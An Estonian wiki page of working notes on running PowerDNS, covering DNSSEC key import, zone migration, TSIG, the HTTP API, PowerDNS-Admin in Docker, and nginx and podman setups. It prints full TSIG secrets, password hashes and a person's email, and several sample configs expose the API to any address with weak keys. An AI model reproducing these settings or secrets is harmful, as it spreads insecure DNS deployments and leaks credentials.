Tsooniga seotud võtme eemaldamiseks sobib öelda, kus ID on show-zone väljundist välja valitud võtme ID väärtus

# pdnsutil remove-zone-key moraal.ee ID

====Kasulikud lisamaterjalid====

* https://doc.powerdns.com/md/authoritative/howtos/#zsk-rollover

===Mitmesugused haldusprotseduurid===

====tsooni backend muutmine====

TODO

====tsooni toomine PowerDNS kontrolli alla====

Tsooni migreerimiseks suvalisest AXFR-võimelisest nimeserverist sobib

* kirjeldada PowerDNS peal slave

# pdnsutil create-slave-zone moraal.ee 10.0.6.15
Feb 21 22:09:52 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Creating slave zone 'moraal.ee', with master(s) '10.0.6.15:53'

* kopeerida andmed axfr abil üle, kopeerimist kiirendab

# pdns_control retrieve moraal.ee

* muuta PowerDNS tsooni jaoks masteriks, öeldes

SQL> UPDATE domains set type='MASTER' where type='SLAVE';

Kui allikaks on nt BIND ning tsoonifailis on kasutatud generate konstruktsiooni, siis need lahenduvad automaatselt ära

$GENERATE 1-255 $ IN CNAME $.1-255.40.184.10.in-addr.arpa.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/authoritative/migration/

====dnssec tsooni toomine PowerDNS kontrolli alla====

Analoogiliselt eelmisele punktile, aga

* esmalt lülitada dnssec välja, kustutades DS kirje parent tsoonist ja oodates vähemalt DS kirje TTL aja enne järgmise punkti juurde asumist; seejärel on tsooni sisu endine st vanade võtmetega signeeritud andmestik
* tegevused eelmises punktis + uute võtmetega krüptimine
* asuda kasutama uute võtmetega krüptitud tsooni sisu, ja oodata nt 6 tundi
* juurutada parent tsoonis uus DS kirje

====dnssec tsooni toomine PowerDNS kontrolli alla OpenDNSSEC keskkonnast koos vana KSK krüptomaterjaliga====

Eeldusel, et OpenDNSSEC kasutab SoftHSM backendi saab KSK krüptomaterjalid eksportida ja taaskasutada. Ettevalmistuseks tuleb kõnealune tsoon muus osas tavalisel viisil kasutusele võtta. SoftHSM pealt krüptomaterjali eksportimiseks tuleb esmalt teha kindlaks kolm väärust

* SoftHSM label ja pin vaadata nt /etc/opendnssec/conf.xml failist
* kõnealuse tsooni ksk võtme id, vaadata KSK active realt tulp 'CKA_ID'

# ods-ksmutil key list -v

sobib öelda

# softhsm --export moraal.ee-ksk.pem --slot 0 --label "vaartus" --pin vaartus --id vaartus
The key pair has been written to moraal.ee-ksk.pem

teisendada nn BIND kujule

# softhsm-keyconv --tobind --in ksk.pem --name moraal.ee --ksk --algorithm RSASHA256
The private key has been written to Kmoraal.ee+008+09122.private
The public key has been written to Kmoraal.ee+008+09122.key

ning võtta kasutusele PowerDNS juures

# pdnsutil import-zone-key moraal.ee Kksk+008+53675.private active ksk

Edasi seadistatakse DNSSEC analoogliselt nagu seada ikka PowerDNS puhul seadistatakse. Kusjuures 'pdnsutil import-zone-key ...' tulemus on sarnane nagu oleks öeldud

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Kasulikud lisamaterjalid

* http://www.molnar-peter.hu/en/

====pdns-control utiliidi kasutamine====

PowerDNS kus on master tsoon saadab notify oma slavedele (nagu on tsoonifaili NS kirjetes kirjas)

# pdns_control notify <domain>

või näidatud ip aadressile

# pdns_control notify-host <domain> <ip-address>

===TSIG kasutamine===

Nimeserverite vahelise tsooniedastuse juures TSIG juurutamiseks tuleb esmalt tekitada võti

# pdnsutil generate-tsig-key from_dns_to_itm hmac-sha256
Generating new key with 64 bytes (this can take a while)
Nov 26 13:10:37 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Create new TSIG key from_dns_to_itm hmac-sha256 WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ==

kus

* TODO

ning seejärel võti ühe või enama tsooniedastusega seostada

# pdnsutil activate-tsig-key moraal.ee from_dns_to_itm master

Tulemus paistab nii

<pre>
# pdnsutil show-zone moraal.ee
Nov 26 14:09:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016112602 == 2016112602 (serial in the database)
Zone is not actively secured
Zone has following allowed TSIG key(s): from_dns_to_itm
Metadata items:
SOA-EDIT-API DEFAULT
TSIG-ALLOW-AXFR from_dns_to_itm
No keys for zone 'moraal.ee'.
</pre>

kontrolliks sobib kopeerida öeldes

$ dig @192.168.1.248 moraal.ee axfr -y "hmac-sha256:from_dns_to_itm:WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ=="

kusjuures vastuses on üks preudokirje lisaks

..
from_dns_to_itm. 0 ANY TSIG hmac-sha256. 1480164029 300 32 t96WhnpNiAiL5KHXa8UzNthM6/p3ciQptF3Br2ZfhFk= 3538 NOERROR 0
...

Väited

* Sama TSIG võtit saab kasutada mitme tsooni jaoks ja nii on mugavam nt NSD patternit kasutada
* tundub, et tsooni jaoks TSIG juurutamisega kaasneb, et tsooni kopeerimise ip piirang enam ei kehti (lubatud ip pealt pöördudes ei ole võtme esitamine vajalik)
* kui tsooni juures on tsig sisse lülitatud, siis see mõjub nii notify kui xfr jaoks
* TSIG pseudokirjete arv suureneb vastavalt tsooni mahu suurenemisele, https://tools.ietf.org/html/rfc2845 'The TSIG MUST be included on the first and last DNS envelopes. It can be optionally placed on any intermediary envelopes. It is expensive to include it on every envelopes, but it MUST be placed on at least every 100'th envelope.'

Alternatiiv on kasutada -y asemel -k suvandit ja argumendiks failinime, faili sisuga

<pre>
key "from_yks_to_teine" {
algorithm HMAC-SHA256;
secret "YY8xvlL6yGjrt1G4xlfLBaidQOFdvixHgRXN6tXUPMitEKZUs7kl7qixJ0nSN1bbDJQxaFGkoKkBamNS7EPXbw==";
};
</pre>

===API kasutamine===

Üle API muudatuse tegemiseks peab eelnevalt PowerDNS serveris lülitama API sisse ning sisemise webserver käivitama

# cat /etc/powerdns/pdns.conf
..
api=yes
api-key=apiparool
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24
...

ja kasutama nt sellist skripti (töökohaarvutis on seejuures abil kasutada nt jq utiliiti)

<pre>
# cat pdns-api.sh
curl -X PATCH --data \
'{"rrsets":
[{ "name": "www.moraal.ee.",
"records": [{ "content": "192.168.254.5", "disabled": false }],
"ttl": 86000,
"type": "A",
"changetype": "REPLACE"
}]
}' -H 'X-API-Key: midagisalajast123' http://192.168.1.248:8081/api/v1/servers/localhost/zones/moraal.ee. | jq .
</pre>

kus

* TODO

kas käivitamiseks öelda

$ sh pdns-api.sh

API'ga tutvumiseks võib olla hea mõte kuulata pealt mingi olemasoleva API-rakenduse ja serveri vahelist liiklust ja siis seda Wireshark abil uurida.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/httpapi/README/ - tundub, et süntaks pole seal kõigis näidetes päris korrektne

===PowerDNS kasutusstatistika===

PowerDNS sisaldab sisemist veebiserverit, mille käest saab küsida teenuse kasutusstatistikat, TODO.

===Logimine===

Tundub, et vaikimisi logitakse syslog'i.

===Varundamine ja taaste===

TODO

===Misc===

====Paigaldamine operatsioonisüsteemi paketihaldusest====

Paigaldamiseks sobib öelda, tuleb paigalda üldosa + mingi backend, nt BIND-ühilduvate tsoonifailide käsitlemise komponent (st failisüsteem)

# apt-get install pdns-server pdns-backend-bind

Tulemusena tekib failisüsteemi

* /etc/powerdns/pdns.conf - peamine seadistusfail

====MySQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====pdns-backend-mysql paigaldamine ja seadistamine====

Eeldusel, et MySQL baas juba töötab samas arvutis, sobib paigaldamiseks sobib öelda (seejuures kasutades db-config sistemat, mis paigaldamise käigus tekitab create database baasi, kasutaja, sätib privileegid jne)

# apt-get install pdns-backend-mysql
..
Determining localhost credentials from /etc/mysql/debian.cnf: succeeded.
dbconfig-common: writing config to /etc/dbconfig-common/pdns-backend-mysql.conf

Creating config file /etc/dbconfig-common/pdns-backend-mysql.conf with new version

Creating config file /etc/powerdns/pdns.d/pdns.local.gmysql.conf with new version
checking privileges on database pdns for pdns@localhost: user creation needed.
granting access to database pdns for pdns@localhost: success.
verifying access for pdns@localhost: success.
creating database pdns: success.
verifying database pdns exists: success.
populating database via sql... done.
dbconfig-common: flushing administrative password
Processing triggers for libc-bin (2.24-3) ...
Processing triggers for pdns-server (4.0.1-5) ...

Tulemusena

* tekitatakse MySQL kasutaja pdns
* tekitatakse MySQL create database pdns

====BIND backend kasutamine====

Tundub, et otsekoheselt failisüsteemis tsoonifaili redigeerimise teel on mõeldav töötada ainult BIND-formaadis backendiga. Muudega tuleks kasutada pdnsutil utiliiti või API liidest. Tsoonide nimekiri kirjeldatakse failis

# cat /etc/powerdns/named.conf
# Debian default: supermaster created zones are written here:
include "/var/lib/powerdns/supermaster.conf";
# Example for a manually configured slave zone:
#
zone "example.net" {
file "/var/lib/powerdns/zones.slave.d/example.net.zone";
type master;
masters { 192.0.2.53; };
};

Tsoon kirjeldatakse failis

# cat /var/lib/powerdns/zones.slave.d/example.net.zone
$TTL 180
@ IN SOA ns1.example.net. hostmaster.example.net. (
2014080705 ; Serial Number (date YYYYMMDD++)
86400 ; Refresh (24 hours)
1800 ; Retry (1/2 hour)
3600000 ; Expire (42 days)
21600) ; Minimum (6 hours)
IN NS ns1.example.net.
IN NS ns2.example.net.

@ IN A 192.168.0.15
IN MX 10 mail.example.net.
www IN A 192.168.0.15
mail IN A 192.168.0.2
ns1 IN A 10.1.1.171
ns2 IN A 10.1.1.172
imre IN A 10.1.1.173

Muudatuse kehtestamiseks

# pdns_control bind-reload-now example.net
example.net: parsed into memory at 2016-10-26 20:43:14 +0300

====PostgreSQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====BIND backend kasutamine====

pdns-backend-bind seadistatakse failist

# egrep -v "^$|^#" /etc/powerdns/pdns.d/bind.conf
launch+=bind
bind-config=/etc/powerdns/named.conf
bind-supermaster-config=/var/lib/powerdns/supermaster.conf
bind-supermaster-destdir=/var/lib/powerdns/zones.slave.d

kus

* /etc/powerdns/named.conf - tsoonide nimekiri
* /var/lib/powerdns/supermaster.conf - lihtsal juhul tühi
* /var/lib/powerdns/zones.slave.d - BIND formaadis tsoonifailide kataloog

Tsoonide haldamisega tegeleb edasi allpool olev punkt.

====Poweradmin====

Märkus: tõenäoliselt ei ole Poweradmin tarvkara kasutamine hea mõte kuna rakendus sodib otse PowerDNS andmebaasis ja 2016 aasta sügisel on hakanud tekkima paremaid alternatiive, nt nsedit.

Poweradmin kasutamiseks peab PowerDNS kasutama SQL andmebaasi ja Poweradmin peab töötama vastu sama andmebaasi. Tundub, et Poweradmin töötab paremini MySQL + PHP5 keskkonnas. Kui Poweradmin PHP rakendus töötab teises arvutis kui MySQL baas, sobib baasis öelda

mysql> grant all privileges on pdns.* to 'pdns'@'%' identified by 'dbconfig sisestatud parool';
mysql> grant all privileges on pdns.* to 'pdns'@'localhost' identified by 'dbconfig sisestatud parool';
mysql> flush privileges;

# pdns_control retrieve moraal.ee
Added retrieval request for 'moraal.ee.' from master 192.168.1.247

Kasulikud lisamaterjalid

* https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-powerdns-with-a-mariadb-backend-on-ubuntu-14-04

====Tsooni andmestikust otsing====

* Kõigi forward tsoonide sisust ip aadressi kasutamise leidmine

# for i in `pdns_control list-zones | grep -v All | grep -v in-addr`; do pdnsutil list-zone $i 2>&1 ; done | grep 10.20.123.154
ftp.moraal.ee 300 IN A 10.20.123.154

===2024 aasta kevade tähelepanekud===

Eesmärk

* ühe operatsioonisüteemi peal kompaktselt lahenduse pidamine - Debian v. 12
* dns server - PowerDNS
* webgui haldusliides - PowerDNS-Admin (PDA)
* dnssec võimekus
* docker abil kasutatakse konteinerit (PDA)
* andmeid hoitakse PostgreSQL andmebaasis

====Tööpõhimõte====

Väited

* dnssec kasutab algoritmi nr 13
* NSEC3 kasutab '1 0 0 -' seadistust
* sekundaarsete nimeserveritega suhtlemine toimub catalog-zones abil
* kasutatakse KSK/ZSK ja CSK lähenemist võtmete pidamisel

Protseduuride võimekus

* NSEC, NSEC3 ja NSEC3 param väärtuste muutmine
* võtme vahetus
* krüptimise algoritmi vahetus

====Platvormi ettevalmistamine====

Platvorm koosneb

* Debian v. 12 operatsioonisüsteem
* Docker Community Edition
* PostgreSQL v. 12
* NginX

PostgreSQL

<pre>
root@pdns:/tmp# apt-get install postgresql-common
root@pdns:/tmp# mkdir /etc/postgresql-common/createcluster.d
root@pdns:/tmp# echo "initdb_options = '--data-checksums'" > /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# echo "create_main_cluster = false" >> /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# apt-get install postgresql-16
root@pdns:/tmp# pg_createcluster --locale en_US.UTF-8 16 pgcluster_pdns_prod

postgres=# \x
Expanded display is on.
postgres=# \l postgres
List of databases
-[ RECORD 1 ]-----+------------
Name | postgres
Owner | postgres
Encoding | UTF8
Locale Provider | libc
Collate | en_US.UTF-8
Ctype | en_US.UTF-8
ICU Locale |
ICU Rules |
Access privileges |
</pre>

PowerDNS kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pdns login;
sql> \password pdns
sql> create database db_pdns owner = pdns;
</pre>

PowerDNS-Admin kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pda login;
sql> \password pda
sql> create database db_pda owner = pda;
</pre>

====PowerDNS paigaldamine====

PowerDNS ise ja tema tööks otseselt vajalikud komponendid (nt PostgreSQL andmebaas) töötavad nö tavalisel viisil operatsioonisüsteemi protsesside-teenustena st mitte-konteineritena.

<pre>
# apt-get install pdns-server pdns-backend-pgsql pdns-tools
</pre>

Tulemusena käivitatakse pdns server ja tema bind backend.

TODO

PostgreSQL backend kasutamine

<pre>
# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql
Password for user pdns:
CREATE TABLE
CREATE INDEX
CREATE INDEX
CREATE TABLE
CREATE INDEX
...
</pre>

Baasi ligipääs jms kirjeldatakse failis, https://doc.powerdns.com/authoritative/backends/generic-postgresql.html#

<pre>
root@pdns:~# egrep -v "^#|^$" /etc/powerdns/pdns.d/gpgsql.conf
launch+=gpgsql
gpgsql-dbname=db_pdns
gpgsql-dnssec=yes
gpgsql-host=127.0.0.1
gpgsql-password=parool
gpgsql-port=5432
gpgsql-user=pdns
</pre>

bind eemaldamiseks sobib kustutada fail

# rm /etc/powerdns/pdns.d/bind.conf

Tulemusena töötab pdns server, gpgsql backendiga

<pre>
2024-06-16T16:44:00.877817+03:00 pdns systemd[1]: Starting pdns.service - PowerDNS Authoritative Server...
2024-06-16T16:44:00.906026+03:00 pdns pdns_server[3916]: Loading '/usr/lib/x86_64-linux-gnu/pdns/libgpgsqlbackend.so'
2024-06-16T16:44:00.906356+03:00 pdns pdns_server[3916]: This is a standalone pdns
2024-06-16T16:44:00.906408+03:00 pdns pdns_server[3916]: Listening on controlsocket in '/run/pdns/pdns.controlsocket'
2024-06-16T16:44:00.906668+03:00 pdns pdns_server[3916]: UDP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906684+03:00 pdns pdns_server[3916]: UDP server bound to [::]:53
2024-06-16T16:44:00.906735+03:00 pdns pdns_server[3916]: TCP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906750+03:00 pdns pdns_server[3916]: TCP server bound to [::]:53
2024-06-16T16:44:00.906866+03:00 pdns pdns_server[3916]: PowerDNS Authoritative Server 4.9.1 (C) PowerDNS.COM BV
2024-06-16T16:44:00.906881+03:00 pdns pdns_server[3916]: Using 64-bits mode. Built using gcc 12.2.0 on May 28 2024 07:46:05 by root@localhost.
2024-06-16T16:44:00.906891+03:00 pdns pdns_server[3916]: PowerDNS comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it according to the terms of the GPL version 2.
2024-06-16T16:44:00.915255+03:00 pdns pdns_server[3916]: Polled security status of version 4.9.1 at startup, no known issues reported: OK
2024-06-16T16:44:00.926644+03:00 pdns pdns_server[3916]: Creating backend connection for TCP
2024-06-16T16:44:00.935773+03:00 pdns pdns_server[3916]: About to create 3 backend threads for UDP
2024-06-16T16:44:00.935850+03:00 pdns systemd[1]: Started pdns.service - PowerDNS Authoritative Server.
2024-06-16T16:44:01.086206+03:00 pdns pdns_server[3916]: Done launching threads, ready to distribute questions
</pre>

ühtegi tsooni ei ole kirjeldatud

<pre>
root@pdns:/tmp# pdnsutil list-all-zones
root@pdns:/tmp#
</pre>

====PowerDNS seadistamine====

Seadistamisel tegeldakse

* api sisselülitamine (PDA jaoks)
* SOA kirje vaikeväärtused
* DNSSEC vaike krüpto

====PowerDNS-Admin paigaldamine - PDA - docker====

PowerDNS-Admin tarvkara töötab docker konteinerina, aga kasutab host arvutist postgresql andmebaasi. Platvorm ettevalmistamine punktis on vajalik kasutaja ja create database tekitatud. PDA kasutamine eeldab, et PDNS juures on sisse lülitatud api liides (vaikimisi http liiklus üle port 8081).

Docker compose fail

<pre>
root@pdns:~# cat docker-compose-pda.yml
services:
svc_pda:
image: powerdnsadmin/pda-legacy:v0.4.2

container_name: cn_pda
restart: always
logging:
driver: json-file
options:
max-size: 50m
ports:
- "9191:80"
environment:
- SECRET_KEY='saladus'
- SQLALCHEMY_DATABASE_URI=postgresql://pda:pdaparool@192.168.10.53/pda
- GUNICORN_TIMEOUT=60
- GUNICORN_WORKERS=2
- GUNICORN_LOGLEVEL=DEBUG
- OFFLINE_MODE=False
- CSRF_COOKIE_SECURE=False

networks:
- nw_pda

networks:
nw_pda:
name: nw_pda
driver: bridge
</pre>

Käivitamiseks

# docker compose -f docker-compose-pda.yml up -d

Tulemusena on aadressil http://192.168.10.53:9191/ PDA webgui sisselogimise ekraan. Pressida Create Account ja esimesena tekitatud kasutaja on admin privileegidega.

TODO

====PowerDNS-Admin paigaldamine - NginX operatsioonisüsteem====

NginX https:// frontend kasutamiseks sobib kasutada sellist seadistust

<pre>
root@pdns:/etc/nginx/sites-enabled# cat /etc/nginx/sites-enabled/pdns
server {
listen 80;
server_name pdns.moraal.ee;
root /var/www/html;

if ($request_uri !~ /.well-known) {
return 301 https://pdns.moraal.ee/;
}
}

server {
listen 443 ssl http2;
server_name pdns.moraal.ee;
ssl_certificate /etc/ssl/localcerts/pdns.moraal.ee.pem;
ssl_certificate_key /etc/ssl/localcerts/pdns.moraal.ee.key;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305;

client_max_body_size 25m;

ssl_stapling off;
add_header Strict-Transport-Security "max-age=63072000" always;

access_log /var/log/nginx/access-pdns.moraal.ee-443.log;
root /var/www/html;

location / {
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Forwarded-Proto https;
proxy_pass http://192.168.10.53:9191;
}
}
</pre>

====PowerDNS-Admin paigaldamine - NginX docker====

<pre>
# cat /srv/pdns/volume/nginx/etc/nginx/nginx.conf
# nginx.conf

user nginx;
worker_processes auto;
error_log /dev/stderr;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /dev/stdout main;

sendfile on;
keepalive_timeout 65;

# Redirect HTTP to HTTPS
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}

# HTTPS Configuration
server {
listen 443 ssl;
server_name _;
http2 on;
ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers on;

ssl_certificate /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.crt;
ssl_certificate_key /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.key;

# Recommended security settings
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305;

# Logging
access_log /dev/stdout;
error_log /dev/stdout;

# Reverse proxy to the destination
location / {
proxy_pass http://svc_pdns:8081;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
</pre>

====Misc====

Tulemusena saab pda webgui poole pöörduda aadressiga https://pdns.moraal.ee/.

PDA kasutaja parooli muutmine postgresql baasis, nb rakendus kasutab tabeli nimena 'user', see on postgresql nö built-in objekt ja name clash ületamiseks tuleb pöörduda rakendusega seotud ressursi poole "user" abil, eriti koos skeemi prefiksiga

<pre>
# su - postgres
$ psql db_pda
pda=# select * from public."user";
-[ RECORD 1 ]------------------------------------------------------------
id | 1
username | admin
password | $2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FF
firstname | Imre
lastname | Oolberg
email | imre.oolberg@auul.pri.ee
otp_secret |
role_id | 1
confirmed | f
..

db_pda=# update public."user" set password='$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC' where username='admin';
UPDATE 1
</pre>

kusjuures password väärtus tekitatakse nt

<pre>
$ htpasswd -bnBC 15 "" pdaparool | tr -d ':\n'
$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC
</pre>

Kasutaja lisamine

<pre>
db_pda=# insert into "user" (username, password, firstname, lastname, email, role_id, confirmed) values ('admin', '$2b$12$4M9qXQaWn95GTregvSO2v.I/1QQT0/Ayqt3jZsMp06FIa5dMme6Gu', 'Administrator', 'Administrator', 'priit@moraal.ee', 1, 'f');
</pre>

pdns api kontakti lisamine

<pre>
db_pda=# insert into setting (name, value) values ('pdns_api_url', 'http://192.168.10.80:8081');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_api_key', 'apiparool');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_version', '4.9.11');
INSERT 0 1
db_pda=# select * from setting;
id | name | value
----+--------------+------------------------
7 | pdns_api_url | http://192.168.10.80:8081
8 | pdns_api_key | apiparool
9 | pdns_version | 4.9.11
(3 rows)
</pre>

====PDA kasutamise privileegid====

Väited

* Account - grupi taoline moodustis, praktiliselt võiks vastata domeeni omanik asutusele
* User - kasutaja taoline moodustis, vastab inimesele kes süsteemi kasutab
* User ja Account vaheliste seoste abil saab anda hulgale kasutajatele õiguse tegeleda hulga domeenidega

<pre>
root@rv-xxx-01:/opt/pda/dc# docker exec -ti e8 sh
/app $ ps aux
PID USER TIME COMMAND
1 pda 0:00 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
7 pda 0:02 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
8 pda 0:01 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG

[2025-10-31 13:06:25,927] [record.py:61] ERROR - Cannot fetch zone's record data from remote powerdns api. DETAIL: HTTPSConnectionPool(host='rvxxx-01.test.moraal.ee', port=443): Max retries exceeded with url: /api/v1/servers/localhost/zones/imretest-03.ee (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1007)')))

volumes:
# - /opt/pda/volume/pda/etc/ssl/certs/ca-certificates.crt:/usr/lib/python3.10/site-packages/certifi/cacert.pem
</pre>

====PDA API liidese kasutamine====

Tsooni tekitamine

<pre>
$ curl -s -L -H 'Content-Type: application/json' -H 'Authorization: Basic xxx' -X POST https://pda.moraal.ee/api/v1/pdnsadmin/zones \
--data '{"name": "zone-moraal-imre-test-01.ee.", "kind": "MASTER", "nameservers": ["ans1.moraal.ee.", "ans2.moraal.ee."]}' | jq .
{
"account": "",
"api_rectify": false,
"catalog": "",
"dnssec": false,
"edited_serial": 2026010802,
"id": "zone-moraal-imre-test-01.ee.",
"kind": "Master",
"last_check": 0,
"master_tsig_key_ids": [],
"masters": [],
"name": "zone-moraal-imre-test-01.ee.",
"notified_serial": 0,
"nsec3narrow": false,
"nsec3param": "",
"rrsets": [
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee. hostmaster.moraal.ee. 2026010801 86400 7200 2419200 10800",
"disabled": false
}
],
"ttl": 3600,
"type": "SOA"
},
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee.",
"disabled": false
},
{
"content": "ans2.moraal.ee.",
"disabled": false
}
],
"ttl": 3600,
"type": "NS"
}
],
"serial": 2026010801,
"slave_tsig_key_ids": [],
"soa_edit": "",
"soa_edit_api": "DEFAULT",
"url": "/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee."
}
</pre>

Kui pole ligipääsu saab sellise vastuse

<pre>
% curl -s -L -H 'Content-Type: application/json' -H 'X-API-KEY: xxx' -X GET "https://pda.moraal.ee/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee" | jq .
{
"msg": "Zone access not allowed"
}
</pre>

===pdns docker lahendus===

<pre>
# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.1,192.168.10.0/24
allow-notify-from=
allow-unsigned-notify=yes
also-notify=
api=yes
api-key=saladus
default-api-rectify=yes
default-ksk-algorithm=ecdsa256
default-soa-content=ans1.auu.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600
disable-syslog=no
forward-notify=
include-dir=/etc/powerdns/pdns.d
launch=
local-address=172.30.0.15, 10.30.0.15
local-port=53
log-dns-details=yes
log-dns-queries=yes
log-timestamp=yes
loglevel=4
only-notify=
primary=yes
secondary=yes
webserver=yes
webserver-address=10.30.0.15
webserver-allow-from=0.0.0.0/0
webserver-loglevel=detailed
webserver-password=saladus
webserver-port=8081
</pre>

===pdns podman lahendus===

PDNS Quadlet Service kirjeldus

<pre>
kasutaja@ns-pdns-01:~$ cat .config/containers/systemd/pdns-01.container
[Unit]
Description=My PDNS Quadlet Service
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/powerdns/pdns-auth-49:latest
PublishPort=1053:8053/tcp
PublishPort=1053:8053/udp
ContainerName=pdns-01
Volume=%h/volume/pdns/etc/powerdns/pdns.conf:/etc/powerdns/pdns.conf:ro
Environment=PDNS_local_port=8053

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

ning pdns.conf seadistusfail

<pre>
# cat /opt/pdns/volume/pdns/etc/powerdns/pdns.conf
local-address=0.0.0.0
launch=
# include-dir=/etc/powerdns/pdns.d
api=yes
api-key=parool
webserver=yes
webserver-address=0.0.0.0
webserver-allow-from=0.0.0.0/0

#master=yes

primary=yes
secondary=yes
allow-axfr-ips= 100.20.21.0/24,127.0.0.1/32,172.17.0.0/16
also-notify=192.168.1.150
only-notify=
forward-notify=
default-soa-content=ans1.auul.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600

default-ksk-algorithm=ecdsa256
default-api-rectify=yes
# default-nsec3-param=1 0 0 -

launch+=gpgsql
gpgsql-dnssec=yes
gpgsql-extra-connection-parameters=password=parool dbname=db_pdns port=5432 user=pdns host=192.168.1.147
</pre>

===Tsooni migreerimine pädeva pdns peale===

Väited

* SOA-EDIT -

====Protseduur====

TODO

====Käsundamine====

Tekitatakse migreeritava tsooni sekundaar

<pre>
# pdnsutil create-secondary-zone moraal.ee 192.168.1.148
</pre>

===Kasulikud lisamaterjalid===

* https://www.powerdns.com/
* http://www.poweradmin.org/
* https://github.com/PowerDNS/pdns/wiki/WebFrontends
* http://jpmens.net/2010/10/29/alternative-dns-servers-the-book-as-pdf/
* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/
* https://www.cloudflare.com/dns/dnssec/how-dnssec-works/

PowerDNS Authoritative Server nimeserveri kasutamine

2026-06-16T21:08:40Z

Imre: /* Sissejuhatus */

===Sissejuhatus===

